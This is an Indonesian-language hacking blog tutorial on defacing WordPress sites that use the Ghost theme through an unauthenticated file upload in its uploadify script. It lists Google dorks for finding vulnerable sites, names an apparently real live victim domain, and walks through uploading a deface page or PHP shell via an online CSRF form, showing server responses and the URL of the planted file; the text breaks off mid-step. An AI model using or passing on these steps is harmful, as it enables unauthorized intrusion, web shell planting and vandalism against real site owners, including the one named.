Cara Deface PoC Wp-Ghost Themes With Csrf

Assalamualaikum, halo pengunjung selamat datang di blog Shadow Secure System, pada halaman kali ini saya akan membahas Cara Deface PoC Wp-Ghost Themes With Csrf.

Bahan-bahan:

Dork:

inurl:wp-content/themes/Ghost/
inurl:wp-content/themes/Ghost/includes/
inurl:wp-content/themes/Ghost/includes/uploadify/
inurl:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

( Kembangin lagi biar dapet yang fress )

Live target:

https://www.simseklerdugunsarayi.com/

Exploit:

/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php

Mencari target

Pertama kalian mencari target terlebih dahulu, karena saya sudah mempunyai live target jadi langsung saja kita menambahkan exploit.

Jika sudah memasukan exploit maka kalian akan mendapatkan status response seperti ini:

{"status":"NOK", "ERR":"This file is incorect"}

Csrf online

Setelah kalian mendapatkan status response seperti itu, lanjut kalian pergi ke csrf online cari aja digoogle banyak pada bagian target kalian masukan url target berserta exploitnya lalu dibagian post file kalian ketikan Filedata Lalu kalian lock target setelah terlock targetnya kalian upload file deface atau shell ( jika support php ) disini saya mengupload script deface, setelah memilih script deface kalian klik tombol upload.

Jika kalian sudah mengklik tombol upload maka kalian akan mendapatkan response upload seperti ini:

{"status":"OK","imageID":"stronghtml","imageName":"strong.html","html":"\n\t\n\t\t html File<\/div><\/td>\n\t\tstrong.html \n\t\t\t[Delete]<\/a>\n\t\t<\/td>\n\t<\/tr>\n"}

Akses file

Jika file kalian berhasil terupload sekarang saatnya kalian akses file yang tadi berhasil terupload, kalian akses filenya seperti ini:

https://www.simseklerdugunsarayi.com/wp-content/uploads/settingsimages/nama file.html

Setelah diakses